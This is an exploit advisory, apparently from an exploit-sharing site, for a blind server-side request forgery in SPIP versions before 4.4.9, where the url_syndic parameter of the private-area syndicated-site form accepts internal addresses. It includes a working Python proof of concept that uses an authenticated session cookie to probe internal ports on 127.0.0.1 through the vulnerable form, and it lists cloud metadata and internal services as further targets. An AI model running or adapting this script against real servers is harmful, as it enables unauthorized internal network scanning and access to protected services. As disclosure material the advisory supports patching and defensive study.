=============================================================================================================================================
| # Title     : SPIP < 4.4.9 Blind SSRF via Syndicated Sites in Private Area                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
=============================================================================================================================================

[+] Summary    : SPIP versions prior to 4.4.9 are vulnerable to a Blind Server-Side Request Forgery (SSRF) issue within the private administration interface.

When an authenticated user edits a syndicated site, the application fails to properly validate the url_syndic parameter. Specifically:

The syndication URL is not strictly validated as a legitimate external remote URL.

The application allows arbitrary URLs, including:

http://127.0.0.1

Internal IP ranges (e.g., 10.x.x.x, 192.168.x.x)

Potentially external attacker-controlled endpoints

The server initiates backend HTTP requests to the supplied destination.

Because the response is not directly returned to the attacker, the issue is classified as Blind SSRF. However, it can still enable:

Internal port scanning

Access to internal services (e.g., databases, cache servers)

Interaction with cloud metadata services (if applicable)

Network enumeration through timing or behavioral analysis

Importantly, this vulnerability is not mitigated by the SPIP security screen, meaning standard protection mechanisms do not prevent exploitation.

[+] POC   : 

import requests

target_url = "http://target-spip.com/ecrire/?exec=site_edit"
session_cookie = {"spip_session": "your_session_id_here"}


ports_to_scan = [21, 22, 80, 443, 3306, 6379]

for port in ports_to_scan:

    payload = {
        "url_syndic": f"http://127.0.0.1:{port}",
        "syndication": "oui",
        "modifier": "Enregistrer"
    }
    
    response = requests.post(target_url, data=payload, cookies=session_cookie)

    print(f"Checking internal port {port}... Status: {response.status_code}")
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================